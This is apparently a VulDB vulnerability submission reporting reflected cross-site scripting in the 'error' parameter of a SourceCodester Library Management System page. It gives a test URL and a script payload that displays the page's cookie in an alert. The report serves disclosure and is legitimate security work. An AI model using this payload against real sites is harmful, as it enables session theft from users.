Submeter #43299: Library Management System front desk /qr/I/ Cross Site Scriptinformação

TítuloLibrary Management System front desk /qr/I/ Cross Site Script
Descriçãoinfo:Library Management System front desk /qr/I/ Cross Site Script The parameter in index.php of this page is error parameter is not filtered, which can directly xss attack to steal cookie information Direct access to the page address: http://192.168.153.1:8090/qr/I/?error=123 Then replace 123 with xss code <script>alert(document.cookie)</script> Access address: http://192.168.153.1:8090/qr/I/?error=<script>alert(document.cookie)</script> XSS can be achieved payload: /qr/I/?error=<script>alert(document.cookie)</script>
Fonte⚠️ https:// www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html
Utilizador
 jsbae3449 (UID 30775)
Submissão10/08/2022 11h23 (há 4 anos)
Moderação11/08/2022 11h04 (24 hours later)
EstadoAceite
Entrada VulDB206164 [SourceCodester Library Management System /qr/I/ Erro Script de Site Cruzado]
Pontos20

VoltarVisão GeralPróximo

Want to know what is going to be exploited?

We predict KEV entries!